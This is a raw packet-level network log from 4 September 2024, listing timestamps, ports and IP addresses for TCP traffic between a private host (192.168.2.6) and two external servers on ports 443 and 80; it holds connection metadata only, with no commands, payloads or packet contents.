Sep 4, 2024 17:37:08.570974112 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.570993900 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.572257996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.572273016 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.572321892 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.572329998 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.572369099 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.573529005 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.573544025 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.573584080 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.573590994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.573616982 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.573635101 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.574117899 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.574134111 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.574182034 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.574188948 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.574227095 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.574866056 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.574878931 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.574912071 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.574918985 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.574938059 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.574960947 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.575432062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.575450897 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.575495005 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.575503111 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.575537920 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.576347113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576389074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576419115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576431990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576441050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576459885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576461077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576484919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576530933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576540947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576550961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576559067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576567888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576567888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576582909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576613903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576632023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576643944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576647997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576654911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576663017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576673985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576689959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576801062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576812029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576821089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576832056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576842070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576858044 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576917887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576951981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.576977968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576989889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.576999903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577023029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577023029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577188969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577231884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577306986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577318907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577327967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577338934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577347040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577358007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577366114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577369928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577377081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577382088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577399015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577423096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577584028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577599049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577608109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577616930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577634096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577640057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577649117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577655077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577658892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577671051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577672005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577682018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577692032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577692032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577701092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577712059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577718019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577721119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577728033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577733040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577740908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577769041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577769995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577781916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577790022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577800989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577806950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577812910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.577827930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.577851057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578001022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578011990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578021049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578032017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578035116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578057051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578075886 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578166962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578178883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578187943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578197956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578203917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578210115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578213930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578217983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578226089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578234911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578239918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578247070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578253984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578258038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578274012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578294039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578480005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578491926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578500986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578510046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578516006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578537941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578558922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578665018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578675985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578685045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578695059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578699112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578706026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578708887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578716040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578727961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578748941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578902960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578918934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578927040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578936100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578943014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578947067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578958035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578963995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578969955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578978062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578979015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.578989029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578999043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.578999996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579011917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579013109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579036951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579051971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579247952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579260111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579268932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579279900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579289913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579292059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579299927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579310894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579313993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579320908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579320908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579333067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579343081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579344988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579365969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579380035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579570055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579581976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579590082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579601049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579612017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579616070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579624891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579627037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579634905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579648018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579649925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579660892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579669952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579675913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579682112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579691887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579695940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.579710960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.579747915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580001116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580009937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580018997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580029011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580043077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580056906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580076933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580121994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580133915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580142975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580157042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580158949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580163956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580180883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580193996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580316067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580327034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580338955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580354929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580357075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580363035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580367088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580378056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580388069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580393076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580399990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580410957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.580410957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580430984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.580449104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.599734068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599755049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599764109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599792004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.599817991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.599847078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599860907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599869967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599883080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599885941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.599906921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.599916935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.599951982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.599988937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601382971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601394892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601403952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601423979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601440907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601452112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601466894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601485014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601505041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601511955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601545095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601697922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601747990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601942062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.601994038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.601998091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602009058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602030993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602035046 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602041006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602041960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602056026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602075100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602077007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602099895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602112055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602130890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602153063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602161884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602170944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602188110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602202892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602272034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602283955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602303028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602312088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602317095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602324009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.602332115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.602351904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607454062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607498884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607511044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607523918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607547045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607548952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607554913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607573032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607608080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607645035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607677937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607687950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607696056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.607712984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607721090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.607733965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.608272076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.608311892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.608330011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.608342886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.608376980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.608392954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.608397007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.608405113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.608423948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.608431101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.608458042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.608468056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.608506918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.608506918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609503031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609533072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609540939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609541893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609571934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609572887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609572887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609584093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609615088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609661102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609672070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609682083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609689951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609710932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609771013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609781981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609791040 CEST	80	49719	147.45.44.104	192.168.2.6
